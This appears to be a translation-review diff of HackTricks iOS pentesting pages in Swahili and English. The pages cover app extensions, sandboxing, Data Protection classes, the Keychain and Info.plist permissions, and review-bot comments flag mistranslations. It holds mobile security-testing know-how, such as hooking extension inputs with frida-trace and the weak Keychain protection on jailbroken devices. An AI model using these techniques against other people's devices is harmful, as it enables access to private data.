* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Vipengele vya programu huongeza utendaji wa programu kwa kuwaruhusu kuingiliana na programu nyingine au mfumo, kutoa huduma au maudhui ya kipekee. Vipengele hivi ni pamoja na:
App extensions huongeza kazi za programu kwa kuruhusu kuingiliana na programu nyingine au mfumo, kutoa vipengele au maudhui maalum. Extensions hizi zinajumuisha:
- **Kibodi Maalum**: Inatoa kibodi ya kipekee kwenye programu zote, ikichukua nafasi ya kibodi ya iOS ya msingi.
- **Shiriki**: Inawezesha kushiriki kwenye mitandao ya kijamii au na wengine moja kwa moja.
- **Leo (Vidude)**: Inatoa maudhui au kutekeleza kazi haraka kutoka kwenye Tazama ya Kituo cha Arifa.
- **Custom Keyboard**: Inatoa kibodi ya kipekee katika programu zote, ikibadilisha kibodi ya kawaida ya iOS.
- **Share**: Inaruhusu kushiriki kwenye mitandao ya kijamii au na wengine moja kwa moja.
- **Today (Widgets)**: Inatoa maudhui au inatekeleza kazi haraka kutoka kwa mtazamo wa Leo wa Kituo cha Arifa.
Wakati mtumiaji anashirikiana na vipengele hivi, kama vile kushiriki maandishi kutoka kwenye programu mwenyeji, kipengele hicho kinaprocessinga kuingia huko ndani ya muktadha wake, kwa kutumia habari iliyoshirikiwa kutekeleza kazi yake, kama ilivyoelezwa katika nyaraka za Apple.
Wakati mtumiaji anaposhiriki na extensions hizi, kama vile kushiriki maandiko kutoka kwa programu mwenyeji, extension inashughulikia ingizo hili ndani ya muktadha wake, ikitumia taarifa zilizoshirikiwa ili kutekeleza kazi yake, kama ilivyoelezwa katika nyaraka za Apple.
### **Mambo ya Kuzingatia kuhusu Usalama**
### **Security Considerations**
Mambo muhimu ya usalama ni pamoja na:
- Vipengele na programu zinazowahifadhi huchangamana kupitia mawasiliano ya kati ya michakato, sio moja kwa moja.
- **Kifaa cha leo** ni kipekee kwa kuwa kinaweza kuomba programu yake ifunguliwe kupitia njia maalum.
- Upatikanaji wa data ulioshirikiwa unaruhusiwa ndani ya chombo cha kibinafsi, lakini upatikanaji wa moja kwa moja umepunguzwa.
- APIs fulani, pamoja na HealthKit, haziruhusiwi kwa vipengele vya programu, ambavyo pia haviruhusiwi kuanza kazi ndefu, kupata kamera, au kipaza sauti, isipokuwa kwa vipengele vya iMessage.
- Extensions na programu zinazozishikilia zinawasiliana kupitia mawasiliano ya kati ya mchakato, si moja kwa moja.
- **Today widget** ni ya kipekee kwa kuwa inaweza kuomba programu yake kufunguliwa kupitia njia maalum.
- Upatikanaji wa data iliyoshirikiwa unaruhusiwa ndani ya kontena binafsi, lakini upatikanaji wa moja kwa moja umepigwa marufuku.
- API fulani, ikiwa ni pamoja na HealthKit, haziruhusiwi kwa extensions za programu, ambazo pia cannot kuanzisha kazi zinazodumu kwa muda mrefu, kufikia kamera, au kipaza sauti, isipokuwa kwa extensions za iMessage.
### Uchambuzi Statisa
### Static Analysis
#### **Kutambua Vipengele vya Programu**
#### **Identifying App Extensions**
Ili kupata vipengele vya programu katika msimbo wa chanzo, tafuta `NSExtensionPointIdentifier` kwenye Xcode au angalia mfuko wa programu kwa faili za `.appex` zinazoonyesha vipengele. Bila msimbo wa chanzo, tumia grep au SSH kuona vitambulisho hivi ndani ya mfuko wa programu.
Ili kupata extensions za programu katika msimbo wa chanzo, tafuta `NSExtensionPointIdentifier` katika Xcode au angalia kifurushi cha programu kwa faili za `.appex` zinazoashiria extensions. Bila msimbo wa chanzo, tumia grep au SSH kutafuta vitambulisho hivi ndani ya kifurushi cha programu.
#### **Aina za Data Zinazoungwa mkono**
#### **Supported Data Types**
Angalia faili ya `Info.plist` ya kipengele cha programu ili kutambua aina za data zinazoungwa mkono na `NSExtensionActivationRule`. Hii inahakikisha kuwa ni aina za data zinazolingana tu zinazosababisha kipengele kwenye programu mwenyeji.
Angalia faili ya `Info.plist` ya extension kwa `NSExtensionActivationRule` ili kubaini aina za data zinazoungwa mkono. Mpangilio huu unahakikisha kuwa aina za data zinazofaa pekee ndizo zinazochochea extension katika programu mwenyeji.
#### **Kushiriki Data**
#### **Data Sharing**
Kushiriki data kati ya programu na kipengele chake kunahitaji chombo cha kushiriki, kilichowekwa kupitia "Vikundi vya Programu" na kupatikana kupitia `NSUserDefaults`. Nafasi hii iliyoshirikiwa ni muhimu kwa uhamishaji wa nyuma ulioanzishwa na vipengele.
Kushiriki data kati ya programu na extension yake kunahitaji kontena lililoshirikiwa, lililowekwa kupitia "App Groups" na kufikiwa kupitia `NSUserDefaults`. Nafasi hii iliyoshirikiwa ni muhimu kwa uhamishaji wa nyuma unaoanzishwa na extensions.
#### **Kuweka Vizuizi kwa Vipengele**
#### **Restricting Extensions**
Programu zinaweza kuweka vizuizi kwa aina fulani za vipengele, haswa kibodi maalum, kuhakikisha kuwa utunzaji wa data nyeti unalingana na itifaki za usalama.
Programu zinaweza kupunguza aina fulani za extensions, hasa kibodi maalum, kuhakikisha usimamizi wa data nyeti unakidhi itifaki za usalama.
### Uchambuzi wa Kudumu
### Dynamic Analysis
Uchambuzi wa kudumu unajumuisha:
Uchambuzi wa dynamic unahusisha:
- **Kuchunguza Vitu Vilivyoshiriki**: Unganisha kwenye `NSExtensionContext - inputItems` ili kuona aina za data zilizoshirikiwa na asili yake.
- **Kutambua Vipengele**: Gund
- **Inspecting Shared Items**: Hook katika `NSExtensionContext - inputItems` ili kuona aina za data zilizoshirikiwa na asili.
- **Identifying Extensions**: Gundua ni extensions zipi zinazosindika data yako kwa kuangalia mifumo ya ndani, kama vile `NSXPCConnection`.
Zana kama `frida-trace` zinaweza kusaidia katika kuelewa michakato ya msingi, hasa kwa wale wanaovutiwa na maelezo ya kiufundi ya mawasiliano ya kati ya mchakato.
## References
* [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/)
* [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
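Review bot: two fragments in the new text are left untranslated or half-translated. In the Security Considerations list, "ambazo pia cannot kuanzisha kazi zinazodumu kwa muda mrefu" should read "ambazo pia haziwezi kuanzisha kazi zinazodumu kwa muda mrefu". In the Dynamic Analysis list, "Hook katika `NSExtensionContext - inputItems`" mixes languages; the removed line used "Unganisha kwenye `NSExtensionContext - inputItems`", which reads correctly. The technical content of the replacement is otherwise an improvement: the old Dynamic Analysis list was cut off mid-word ("Gund") and the new version completes the `NSXPCConnection` point and adds the `frida-trace` sentence.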

View file

@ -1,39 +1,40 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Utofautishaji wa Haki na Sanduku la Mchanga
# Utenganishaji wa Haki na Sandbox
Katika iOS, kuna tofauti katika haki kati ya programu zinazopatikana kwa mtumiaji na michakato muhimu ya mfumo. Programu zinaendeshwa chini ya kitambulisho cha mtumiaji **`mobile`**, wakati michakato muhimu ya mfumo inafanya kazi kama **`root`**. Tofauti hii inaboreshwa na kifaa cha sanduku la mchanga, ambacho kinaweka vizuizi vikali juu ya hatua ambazo programu zinaweza kuchukua. Kwa mfano, hata kama programu zinashiriki kitambulisho cha mtumiaji sawa, zinaruhusiwa kufikia au kubadilisha data ya programu nyingine.
Katika iOS, kuna tofauti katika haki kati ya programu zinazoweza kufikiwa na mtumiaji na michakato ya msingi ya mfumo. Programu zinaendesha chini ya utambulisho wa mtumiaji **`mobile`**, wakati michakato muhimu ya mfumo inafanya kazi kama **`root`**. Utenganishaji huu unaboreshwa na mekanizma ya sandbox, ambayo inatoa mipaka madhubuti juu ya vitendo ambavyo programu zinaweza kuchukua. Kwa mfano, hata kama programu zinashiriki utambulisho sawa wa mtumiaji, zinakatazwa kufikia au kubadilisha data za kila mmoja.
Programu zinafungwa katika saraka maalum (`private/var/mobile/Applications/{kitambulisho cha kubahatisha}`) na zina ufikiaji mdogo wa kusoma kwa maeneo na utendaji fulani wa mfumo, kama vile SMS na simu. Kufikia maeneo yaliyolindwa kunasababisha ombi la idhini ya mtumiaji.
Programu zinawekwa katika directory maalum (`private/var/mobile/Applications/{random ID}`) na zina upatikanaji wa kusoma uliozuiliwa kwa maeneo na kazi fulani za mfumo, kama vile SMS na simu. Upatikanaji wa maeneo yaliyolindwa unachochea ombi la kuruka kwa ruhusa ya mtumiaji.
# Ulinzi wa Data
iOS inatoa watumiaji wa maendeleo **API za Ulinzi wa Data**, zilizojengwa juu ya Kipuri cha Usalama (SEP) - kifaa maalum cha kushirikiana kwa shughuli za kryptografia na usimamizi wa funguo. SEP inahakikisha usalama wa data kupitia funguo maalum za kifaa, UID ya kifaa, iliyojumuishwa ndani yake.
iOS inatoa waendelezaji **Data Protection APIs**, iliyojengwa juu ya Secure Enclave Processor (SEP) — co-processor maalum kwa ajili ya operesheni za kificho na usimamizi wa funguo. SEP inahakikisha ulinzi wa data kwa njia ya funguo maalum za kifaa, UID ya kifaa, iliyojumuishwa ndani yake.
Wakati wa kuunda faili, funguo la kryptografia la AES la biti 256 lenye kipekee huzalishwa, likificha yaliyomo ya faili. Funguo hili la kryptografia, pamoja na kitambulisho cha darasa, kisha hufichwa kwa kutumia funguo la darasa na kuhifadhiwa ndani ya metadata ya faili. Kufichua faili kunahusisha kutumia funguo la mfumo kupata metadata, kupata funguo la darasa na kitambulisho cha darasa, na kisha kufichua funguo la kryptografia la faili.
Pale faili inapotengenezwa, funguo ya kipekee ya AES ya bit 256 inazalishwa, ikificha maudhui ya faili. Funguo hii ya kificho, pamoja na ID ya darasa, kisha inafichwa kwa kutumia funguo ya darasa na kuhifadhiwa ndani ya metadata ya faili. Kufichua faili kunahusisha kutumia funguo ya mfumo kufikia metadata, kupata funguo ya darasa na ID ya darasa, na kisha kufichua funguo ya kipekee ya kificho ya faili.
iOS inaainisha **darasa nne za ulinzi** kwa usalama wa data, ambazo zinaamua lini na jinsi data inaweza kupatikana:
iOS inaelezea **darasa nne za ulinzi** kwa ajili ya usalama wa data, ambazo zinatofautisha wakati na jinsi data inaweza kufikiwa:
- **Ulinzi Kamili (NSFileProtectionComplete)**: Data haiwezi kufikiwa hadi kifaa kifunguliwe kwa kutumia nambari ya siri ya mtumiaji.
- **Lindwa Isipokuwa Ikiwa Imefunguliwa (NSFileProtectionCompleteUnlessOpen)**: Inaruhusu ufikiaji wa faili hata baada ya kifaa kufungwa, ikiwa faili ilifunguliwa wakati kifaa kilipokuwa kimefunguliwa.
- **Lindwa Mpaka Kwanza Mtumiaji Aithibitishe (NSFileProtectionCompleteUntilFirstUserAuthentication)**: Data inapatikana baada ya kufungua mtumiaji wa kwanza baada ya kuanza, na inabaki kupatikana hata kama kifaa kinafungwa tena.
- **Hakuna Ulinzi (NSFileProtectionNone)**: Data inalindwa tu na UID ya kifaa, ikirahisisha kufuta haraka data kwa mbali.
- **Ulinzi Kamili (NSFileProtectionComplete)**: Data haiwezi kufikiwa mpaka kifaa kifunguliwe kwa kutumia nambari ya siri ya mtumiaji.
- **Ililindwa Isipokuwa Iwapo Imefunguliwa (NSFileProtectionCompleteUnlessOpen)**: Inaruhusu upatikanaji wa faili hata baada ya kifaa kufungwa, ikiwa faili ilifunguliwa wakati kifaa kilifunguliwa.
- **Ililindwa Hadi Uthibitisho wa Kwanza wa Mtumiaji (NSFileProtectionCompleteUntilFirstUserAuthentication)**: Data inapatikana baada ya uthibitisho wa kwanza wa mtumiaji baada ya kuanzisha, ikibaki inapatikana hata kama kifaa kimefungwa tena.
- **Hakuna Ulinzi (NSFileProtectionNone)**: Data inalindwa tu na UID ya kifaa, ikiruhusu kufuta data kwa haraka kwa mbali.
Ufichuzi wa darasa zote, isipokuwa `NSFileProtectionNone`, unahusisha funguo inayotokana na UID ya kifaa na nambari ya siri ya mtumiaji, ikihakikisha ufichuzi unawezekana tu kwenye kifaa chenye nambari ya siri sahihi. Tangu iOS 7, darasa la ulinzi la chaguo-msingi ni "Lindwa Mpaka Kwanza Mtumiaji Aithibitishe".
Fichuo la madarasa yote, isipokuwa `NSFileProtectionNone`, linahusisha funguo inayotokana na UID ya kifaa na nambari ya siri ya mtumiaji, kuhakikisha kwamba kufichua kunawezekana tu kwenye kifaa chenye nambari sahihi ya siri. Kuanzia iOS 7 na kuendelea, darasa la ulinzi la kawaida ni "Ililindwa Hadi Uthibitisho wa Kwanza wa Mtumiaji".
Watumiaji wa maendeleo wanaweza kutumia [**FileDP**](https://github.com/abjurato/FileDp-Source), chombo cha kuangalia darasa la ulinzi wa data ya faili kwenye iPhone.
Waendelezaji wanaweza kutumia [**FileDP**](https://github.com/abjurato/FileDp-Source), chombo cha kukagua darasa la ulinzi wa data wa faili kwenye iPhone.
```python
# Example code to use FileDP for checking file protection class
# Note: Ensure your device is jailbroken and has Python installed to use FileDP.
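Review bot: the sandbox paragraph's replacement fixes a real error (the removed line said apps sharing the `mobile` uid "zinaruhusiwa" to read each other's data; the new "zinakatazwa" is the correct statement), but the following line regresses: "ombi la kuruka kwa ruhusa ya mtumiaji" renders the permission pop-up as a "jump request", whereas the removed "ombi la idhini ya mtumiaji" was right. Separately, both old and new lines keep the app container path as `private/var/mobile/Applications/{random ID}`, while the entitlements page changed in this same commit greps `/var/containers/Bundle/Application/...`; the two pages disagree, and the latter is the location used by current iOS, so either update this path or mark it as the legacy location.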
@ -44,44 +45,44 @@ python filedp.py /path/to/check
```
## **Keychain**
Katika iOS, **Keychain** inatumika kama **chombo kilichofichwa** na salama kwa kuhifadhi **taarifa nyeti**, inayopatikana tu na programu ambayo iliihifadhi au wale walio na idhini maalum. Ufichaji huu unalindwa na **nenosiri la kipekee lililotengenezwa na iOS**, ambalo lenyewe limefichwa kwa kutumia **AES**. Mchakato huu wa ufichaji unatumia kazi ya **PBKDF2**, ikichanganya kodi ya mtumiaji na chumvi iliyotokana na **UID** ya kifaa, sehemu ambayo chipseti ya **enclave salama** pekee inaweza kufikia. Kwa hivyo, hata kama kodi ya mtumiaji inajulikana, maudhui ya Keychain hayapatikani kwenye kifaa kingine chochote isipokuwa kile ambacho yalifichwa awali.
Katika iOS, **Keychain** inatumika kama **konteina salama iliyo na usimbuaji** kwa ajili ya kuhifadhi **taarifa nyeti**, inayopatikana tu na programu iliyohifadhi taarifa hizo au zile zilizoidhinishwa wazi. Usimbuaji huu unalindwa na **nenosiri la kipekee lililotengenezwa na iOS**, ambalo lenyewe limefichwa kwa **AES**. Mchakato huu wa usimbuaji unatumia **PBKDF2 function**, ukichanganya nambari ya siri ya mtumiaji na chumvi iliyotokana na **UID** ya kifaa, sehemu ambayo ni ya **secure enclave chipset** pekee inayoweza kufikiwa. Kwa hivyo, hata kama nambari ya siri ya mtumiaji inajulikana, maudhui ya Keychain yanabaki yasiyoweza kupatikana kwenye kifaa kingine chochote isipokuwa kile ambacho yalifichwa awali.
**Usimamizi na ufikiaji** wa data ya Keychain unashughulikiwa na **daemani ya `securityd`**, kulingana na idhini maalum za programu kama vile `Keychain-access-groups` na `application-identifier`.
**Usimamizi na ufikiaji** wa data za Keychain unashughulikiwa na **`securityd` daemon**, kulingana na haki maalum za programu kama `Keychain-access-groups` na `application-identifier`.
### **Operesheni za API ya Keychain**
### **Keychain API Operations**
API ya Keychain, iliyoelezewa kwa undani katika [nyaraka za Huduma za Keychain za Apple](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/02concepts/concepts.html), inatoa kazi muhimu za usimamizi wa uhifadhi salama:
Keychain API, iliyoelezwa katika [nyaraka za Keychain Services za Apple](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/02concepts/concepts.html), inatoa kazi muhimu za usimamizi wa hifadhi salama:
- **`SecItemAdd`**: Inaongeza kipengee kipya kwenye Keychain.
- **`SecItemUpdate`**: Inasasisha kipengee kilichopo kwenye Keychain.
- **`SecItemCopyMatching`**: Inapata kipengee kutoka kwenye Keychain.
- **`SecItemDelete`**: Inaondoa kipengee kutoka kwenye Keychain.
- **`SecItemAdd`**: Inaongeza kipengele kipya kwenye Keychain.
- **`SecItemUpdate`**: Inaweza kuboresha kipengele kilichopo kwenye Keychain.
- **`SecItemCopyMatching`**: Inapata kipengele kutoka kwenye Keychain.
- **`SecItemDelete`**: Inafuta kipengele kutoka kwenye Keychain.
Kuvunja nguvu ya nenosiri la Keychain kunahusisha kushambulia moja kwa moja ufunguo uliofichwa au kujaribu kuhadithi kodi ya mtumiaji kwenye kifaa yenyewe, ikizuiliwa sana na kucheleweshwa kwa enclave salama baada ya jaribio lisilofanikiwa.
Kujaribu kufungua nenosiri la Keychain kunahusisha ama kushambulia funguo zilizofichwa moja kwa moja au kujaribu kukisia nambari ya siri kwenye kifaa chenyewe, ambayo inakabiliwa kwa kiasi kikubwa na utekelezaji wa secure enclave wa kuchelewesha kati ya majaribio yasiyofanikiwa.
### **Kuweka Ulinzi wa Data ya Kipengee cha Keychain**
### **Configuring Keychain Item Data Protection**
Viwango vya ulinzi wa data kwenye vitu vya Keychain vinawekwa kwa kutumia sifa ya `kSecAttrAccessible` wakati wa kuunda au kusasisha kipengee. Viwango hivi, [kama ilivyoelezwa na Apple](https://developer.apple.com/documentation/security/keychain_services/keychain_items/item_attribute_keys_and_values#1679100), vinadhibiti wakati na jinsi vitu vya Keychain vinavyopatikana:
Viwango vya ulinzi wa data kwa vipengele vya Keychain vinakabiliwa kwa kutumia sifa ya `kSecAttrAccessible` wakati wa kuunda au kuboresha kipengele. Viwango hivi, [kama ilivyoainishwa na Apple](https://developer.apple.com/documentation/security/keychain_services/keychain_items/item_attribute_keys_and_values#1679100), vinatambulisha wakati na jinsi vipengele vya Keychain vinavyopatikana:
- **`kSecAttrAccessibleAlways`**: Vinapatikana wakati wowote, bila kujali hali ya kufunga kifaa.
- **`kSecAttrAccessibleAlwaysThisDeviceOnly`**: Vinapatikana wakati wowote, lakini havijumuishwi kwenye nakala za akiba.
- **`kSecAttrAccessibleAfterFirstUnlock`**: Vinapatikana baada ya kufungua kifaa mara ya kwanza baada ya kuanza upya.
- **`kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly`**: Sawa na hapo juu, lakini haviwezi kuhamishwa kwenye vifaa vipya.
- **`kSecAttrAccessibleWhenUnlocked`**: Vinapatikana tu wakati kifaa kimefunguliwa.
- **`kSecAttrAccessibleWhenUnlockedThisDeviceOnly`**: Vinapatikana wakati kimefunguliwa, lakini havijumuishwi kwenye nakala za akiba.
- **`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly`**: Inahitaji kodi ya kifaa, lakini havijumuishwi kwenye nakala za akiba.
- **`kSecAttrAccessibleAlways`**: Inapatikana wakati wowote, bila kujali hali ya kufunga kifaa.
- **`kSecAttrAccessibleAlwaysThisDeviceOnly`**: Inapatikana kila wakati, lakini haijajumuishwa kwenye nakala za akiba.
- **`kSecAttrAccessibleAfterFirstUnlock`**: Inapatikana baada ya kufungua mara ya kwanza baada ya kuanzisha upya.
- **`kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly`**: Kama ilivyo hapo juu, lakini haiwezi kuhamishwa kwa vifaa vipya.
- **`kSecAttrAccessibleWhenUnlocked`**: Inapatikana tu wakati kifaa kimefunguliwa.
- **`kSecAttrAccessibleWhenUnlockedThisDeviceOnly`**: Inapatikana wakati kimefunguliwa, haijajumuishwa kwenye nakala za akiba.
- **`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly`**: Inahitaji nambari ya siri ya kifaa, haijajumuishwa kwenye nakala za akiba.
**`AccessControlFlags`** inaboresha njia za ufikiaji, kuruhusu uwakilishi wa kibaiolojia au matumizi ya kodi ya mtumiaji.
**`AccessControlFlags`** zinaboresha zaidi mbinu za ufikiaji, kuruhusu uthibitisho wa kibaiolojia au matumizi ya nambari ya siri.
### **Onyo kuhusu Vifaa Vilivyofunguliwa**
### **Jailbroken Devices Warning**
{% hint style="warning" %}
Kwenye **vifaa vilivyofunguliwa**, ulinzi wa Keychain unakuwa hatarini, na kuweka hatari kubwa ya usalama.
Katika **vifaa vilivyovunjwa**, ulinzi wa Keychain umeharibiwa, na kuleta hatari kubwa ya usalama.
{% endhint %}
### **Uthabiti wa Data ya Keychain**
### **Persistence of Keychain Data**
Tofauti na data maalum ya programu ambayo inafutwa wakati programu inapoondolewa, **data ya Keychain inadumu** kwenye kifaa. Tabia hii inaweza kuwezesha wamiliki wapya wa kifaa cha mkono cha mtu wa zamani kupata data ya programu ya mmiliki wa awali kwa kusakinisha tena programu. Waendelezaji wanashauriwa kufuta data ya Keychain kwa kusudi kabla ya kusakinisha programu au wakati wa kujitolea ili kupunguza hatari hii. Hapa kuna mfano wa nambari ya Swift inayoonyesha jinsi ya kufuta data ya Keychain wakati wa uzinduzi wa kwanza wa programu:
Tofauti na data maalum za programu zinazofutwa wakati wa kufuta programu, **data za Keychain zinadumu** kwenye kifaa. Tabia hii inaweza kuwapa wamiliki wapya wa kifaa cha pili ufikiaji wa data za programu za mmiliki wa awali kwa kuanzisha upya programu. Wanakuza wanashauriwa kufuta data za Keychain kwa hiari wakati wa usakinishaji wa programu au wakati wa kutoka ili kupunguza hatari hii. Hapa kuna mfano wa msimbo wa Swift unaoonyesha jinsi ya kufuta data za Keychain wakati wa uzinduzi wa kwanza wa programu:
```swift
let userDefaults = UserDefaults.standard
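Review bot: The headings in this hunk regress from Swahili to English (L4571 "Configuring Keychain Item Data Protection", L4591 "Jailbroken Devices Warning", L4597 "Persistence of Keychain Data") while the body stays in Swahili; keep the Swahili headings of the replaced lines, e.g. "Kuweka Ulinzi wa Data ya Kipengele cha Keychain" and "Udumu wa Data ya Keychain". In the Persistence paragraph, "kwa kuanzisha upya programu" (by restarting the app) changes the meaning of the replaced "kwa kusakinisha tena programu" (by reinstalling the app), and "Wanakuza" should be "Watengenezaji" (developers).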
@ -93,46 +94,47 @@ userDefaults.set(true, forKey: "hasRunBefore")
userDefaults.synchronize() // Forces the app to update UserDefaults
}
```
# **Uwezo wa Programu**
# **App Capabilities**
Katika uwanja wa maendeleo ya programu, **sandboxing** inacheza jukumu muhimu katika kuimarisha usalama. Mchakato huu huhakikisha kuwa kila programu inafanya kazi ndani ya saraka yake ya nyumbani ya kipekee, hivyo kuzuia upatikanaji wake kwa faili za mfumo au data inayomilikiwa na programu nyingine. Utekelezaji wa vizuizi hivi hufanywa kupitia sera za sandbox, ambazo ni sehemu ya **Trusted BSD (MAC) Mandatory Access Control Framework**.
Katika eneo la maendeleo ya programu, **sandboxing** ina jukumu muhimu katika kuimarisha usalama. Mchakato huu unahakikisha kwamba kila programu inafanya kazi ndani ya directory yake ya nyumbani, hivyo kuzuia kufikia faili za mfumo au data zinazomilikiwa na programu nyingine. Utekelezaji wa vizuizi hivi unafanywa kupitia sera za sandbox, ambazo ni sehemu ya **Trusted BSD (MAC) Mandatory Access Control Framework**.
Wabunifu wa programu wana uwezo wa kusanidi **uwezo au ruhusa** fulani kwa programu zao, kama vile **Data Protection** au **Keychain Sharing**. Ruhusa hizi zinafanywa mara moja baada ya programu kusakinishwa. Hata hivyo, ili kupata rasilimali zilizolindwa fulani, programu lazima ipate idhini wazi kutoka kwa mtumiaji wakati wa jaribio la kwanza. Hii inafanikiwa kupitia matumizi ya _purpose strings_ au _usage description strings_, ambazo hupewa watumiaji katika ombi la idhini.
Wakuu wa programu wana uwezo wa kuunda **uwezo au ruhusa** fulani kwa programu zao, kama vile **Data Protection** au **Keychain Sharing**. Ruhusa hizi zinatumika mara moja baada ya programu kufungwa. Hata hivyo, ili kufikia rasilimali fulani zilizolindwa, programu inapaswa kupata idhini wazi kutoka kwa mtumiaji wakati wa jaribio la kwanza. Hii inafanywa kupitia matumizi ya _purpose strings_ au _usage description strings_, ambazo zinawasilishwa kwa watumiaji katika arifa ya ombi la ruhusa.
Kwa wale walio na ufikiaji wa msimbo wa chanzo, uthibitisho wa ruhusa zilizojumuishwa katika faili ya `Info.plist` unaweza kufanywa kwa:
Kwa wale wenye ufikiaji wa msimbo wa chanzo, uthibitisho wa ruhusa zilizo katika faili ya `Info.plist` unaweza kufanywa kwa:
1. Kufungua mradi katika Xcode.
2. Kupata na kufungua faili ya `Info.plist`.
3. Kutafuta funguo zilizo na kipimo cha `"Privacy -"`, na chaguo la kuona funguo/thamani za asili kwa uwazi.
2. Kutafuta na kufungua faili ya `Info.plist`.
3. Kutafuta funguo zilizoanzishwa na `"Privacy -"`, ikiwa na chaguo la kuona funguo/thamani za asili kwa uwazi.
Wakati unashughulika na faili ya IPA, hatua zifuatazo zinaweza kufuatwa:
Wakati wa kushughulikia faili ya IPA, hatua zifuatazo zinaweza kufuatwa:
1. Kufungua faili ya IPA.
2. Kupata faili ya `Info.plist` ndani ya `Payload/<jina la programu>.app/`.
3. Geuza faili kuwa muundo wa XML ikiwa ni lazima, kwa ukaguzi rahisi.
1. Fungua faili la IPA.
2. Tafuta faili ya `Info.plist` ndani ya `Payload/<appname>.app/`.
3. Geuza faili kuwa katika muundo wa XML ikiwa ni lazima, kwa ajili ya ukaguzi rahisi.
Kwa mfano, _purpose strings_ katika faili ya `Info.plist` inaweza kuonekana kama ifuatavyo:
Kwa mfano, purpose strings katika faili ya `Info.plist` zinaweza kuonekana kama hii:
```xml
<plist version="1.0">
<dict>
<key>NSLocationWhenInUseUsageDescription</key>
<string>Your location is used to provide turn-by-turn directions to your destination.</string>
```
## Uwezo wa Kifaa
Faili ya `Info.plist` ya programu inaonyesha **uwezo wa kifaa** ambao husaidia Duka la App kuchuja programu kulingana na uwezo wa kifaa. Haya yamefafanuliwa chini ya ufunguo wa **`UIRequiredDeviceCapabilities`**. Kwa mfano:
## Device Capabilities
Faili la `Info.plist` la programu linaeleza **uwezo wa kifaa** ambao husaidia Duka la Programu kuchuja programu kwa ajili ya ulinganifu wa kifaa. Hizi zimefafanuliwa chini ya **`UIRequiredDeviceCapabilities`** ufunguo. Kwa mfano:
```xml
<key>UIRequiredDeviceCapabilities</key>
<array>
<string>armv7</string>
</array>
```
Mfano huu unaonyesha kuwa programu inalingana na seti ya maagizo ya armv7. Watengenezaji pia wanaweza kubainisha uwezo kama vile nfc ili kuhakikisha kuwa programu yao inapatikana tu kwenye vifaa vinavyounga mkono NFC.
This example indicates that the app is compatible with the armv7 instruction set. Developers may also specify capabilities like nfc to ensure their app is only available to devices supporting NFC.
## Haki za Matumizi
## Entitlements
